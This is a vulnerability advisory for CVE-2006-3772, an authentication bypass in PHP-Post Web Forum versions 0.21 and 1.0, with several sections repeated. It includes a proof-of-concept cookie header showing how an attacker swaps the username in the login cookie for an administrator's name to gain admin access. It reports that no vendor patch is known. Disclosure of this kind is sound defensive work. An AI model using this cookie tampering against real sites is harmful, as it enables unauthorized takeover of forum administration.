PHP-Post Logincookie Remote Authentication Bypass Vulnerability
BID:19046
CVE-2006-3772 |Info
PHP-Post Logincookie Remote Authentication Bypass Vulnerability
| Bugtraq ID: | 19046 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2006 12:00AM |
| Updated: | Jul 19 2006 07:57PM |
| Credit: | [email protected] reported this vulnerability. |
| Vulnerable: |
PHP-post Web Forum 1.0 PHP-post Web Forum 0.21 |
| Not Vulnerable: | |
Discussion
PHP-Post Logincookie Remote Authentication Bypass Vulnerability
PHP-Post is prone to an authentication-bypass vulnerability. This issue is due to a flaw in the authentication process of the affected application.
Exploiting this issue may allow attackers to gain unauthorized, remote access to administrative functions of the application.
Versions 0.21 and 1.0 are reported vulnerable; other versions may also be affected.
PHP-Post is prone to an authentication-bypass vulnerability. This issue is due to a flaw in the authentication process of the affected application.
Exploiting this issue may allow attackers to gain unauthorized, remote access to administrative functions of the application.
Versions 0.21 and 1.0 are reported vulnerable; other versions may also be affected.
Exploit / POC
PHP-Post Logincookie Remote Authentication Bypass Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept cookie data is available:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44;logincookie[lastv]=1152264284; post[329]=330
change to:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME";
logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330
Attackers can exploit this issue via a web client.
The following proof-of-concept cookie data is available:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44;logincookie[lastv]=1152264284; post[329]=330
change to:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME";
logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330
Solution / Fix
PHP-Post Logincookie Remote Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHP-Post Logincookie Remote Authentication Bypass Vulnerability
References:
References: